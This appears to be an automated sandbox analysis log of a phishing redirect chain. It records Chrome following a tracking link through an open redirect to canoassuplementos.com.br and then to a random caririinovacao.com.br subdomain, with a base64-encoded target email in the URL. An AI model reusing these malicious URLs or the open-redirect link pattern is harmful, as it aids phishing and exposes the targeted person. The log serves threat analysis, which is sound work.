                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                      Permissions-Policy: unload=()
                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                      Date: Thu, 29 Aug 2024 18:55:43 GMT
                      Server: gws
                      Content-Length: 287
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Set-Cookie: NID=517=6Pr7xD7s6qPtgPmASeXX3QosLIDx437-LSZktUOVb0DFPzSI9JORGSMHk_veC9sEIkcb3G9a7TaggJuDi1mFZllO796jcaJNkxtUElqcg3Mc83SRro1hJg-5yQ00DjJL9kJAMierdCbMY2uY4N2Ur9Dm2WvExGLoenkIoBYQeTDC5oJ1DwmQ9A; expires=Fri, 28-Feb-2025 18:55:43 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-08-29 18:55:43 UTC | 158 | IN | Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved
                      2024-08-29 18:55:43 UTC | 129 | IN | Data Ascii: <A HREF="https://canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$">here</A>.</BODY></HTML>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      4 | 192.168.2.4 | 49742 | 184.28.90.27 | 443 | |
                      Timestamp | Bytes transferred | Direction | Data
                      2024-08-29 18:55:43 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-08-29 18:55:44 UTC | 467 | IN | HTTP/1.1 200 OK
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      Content-Type: application/octet-stream
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      Server: ECAcc (lpl/EF06)
                      X-CID: 11
                      X-Ms-ApiVersion: Distribute 1.2
                      X-Ms-Region: prod-weu-z1
                      Cache-Control: public, max-age=139270
                      Date: Thu, 29 Aug 2024 18:55:43 GMT
                      Connection: close
                      X-CID: 2


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      5 | 192.168.2.4 | 49744 | 184.28.90.27 | 443 | |
                      Timestamp | Bytes transferred | Direction | Data
                      2024-08-29 18:55:44 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                      Range: bytes=0-2147483646
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-08-29 18:55:45 UTC | 515 | IN | HTTP/1.1 200 OK
                      ApiVersion: Distribute 1.1
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      Content-Type: application/octet-stream
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      Server: ECAcc (lpl/EF06)
                      X-CID: 11
                      X-Ms-ApiVersion: Distribute 1.2
                      X-Ms-Region: prod-weu-z1
                      Cache-Control: public, max-age=139221
                      Date: Thu, 29 Aug 2024 18:55:45 GMT
                      Content-Length: 55
                      Connection: close
                      X-CID: 2
                      2024-08-29 18:55:45 UTC | 55 | IN | Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      6 | 192.168.2.4 | 49743 | 191.252.144.224 | 443 | 5768 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-08-29 18:55:47 UTC | 756 | OUT | GET //////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                      Host: canoassuplementos.com.br
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:48 UTC | 265 | IN | HTTP/1.1 200 OK
                      Date: Thu, 29 Aug 2024 18:55:48 GMT
                      Server: Apache
                      refresh: 0;url=https://hdjdsigfhgejw.caririinovacao.com.br/?wi=bWZlcmVzQHBlby5vbi5jYQ==$
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      2024-08-29 18:55:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      7 | 192.168.2.4 | 49745 | 191.252.144.224 | 443 | 5768 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-08-29 18:55:49 UTC | 693 | OUT | GET /favicon.ico HTTP/1.1
                      Host: canoassuplementos.com.br
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:49 UTC | 164 | IN | HTTP/1.1 404 Not Found
                      Date: Thu, 29 Aug 2024 18:55:49 GMT
                      Server: Apache
                      Content-Length: 315
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      2024-08-29 18:55:49 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      8 | 192.168.2.4 | 49747 | 164.90.176.213 | 443 | 5768 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-08-29 18:55:49 UTC | 833 | OUT | GET /?wi=bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%83%C3%82%C2%A3%C3%83%C2%A2%C3%82%C2%82%C3%82%C2%AC%C3%83%C2%A2%C3%82%C2%80%C3%82%C2%9A HTTP/1.1
                      Host: hdjdsigfhgejw.caririinovacao.com.br
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-Dest: document
                      Referer: https://canoassuplementos.com.br/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:50 UTC | 181 | IN | HTTP/1.1 200 OK
                      Server: nginx
                      Date: Thu, 29 Aug 2024 18:55:50 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding


                      Target ID: 0
                      Start time: 14:55:33
                      Start date: 29/08/2024
                      Path: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit): false
                      Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase: 0x7ff76e190000
                      File size: 3'242'272 bytes
                      MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: low
                      Has exited: false

                      Target ID: 2
                      Start time: 14:55:36
                      Start date: 29/08/2024
                      Path: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit): false
                      Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2200,i,1794559140253772968,16648018370303227466,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase: 0x7ff76e190000
                      File size: 3'242'272 bytes
                      MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: low
                      Has exited: false

                      Target ID: 3
                      Start time: 14:55:38
                      Start date: 29/08/2024
                      Path: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit): false
                      Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A"
                      Imagebase: 0x7ff76e190000
                      File size: 3'242'272 bytes
                      MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: low
                      Has exited: true

                      No disassembly